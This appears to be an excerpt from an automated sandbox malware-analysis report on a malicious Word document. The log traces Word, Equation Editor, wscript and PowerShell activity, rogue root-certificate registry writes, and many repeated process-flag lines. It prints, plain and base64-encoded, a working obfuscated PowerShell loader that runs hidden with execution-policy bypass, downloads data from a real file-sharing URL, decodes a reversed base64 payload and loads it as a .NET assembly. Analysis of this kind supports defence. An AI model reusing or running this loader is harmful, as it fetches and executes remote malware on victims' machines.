      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D8F44 push eax; retf 2_2_002D8F61
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D01F4 push eax; retf 2_2_002D01F5

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
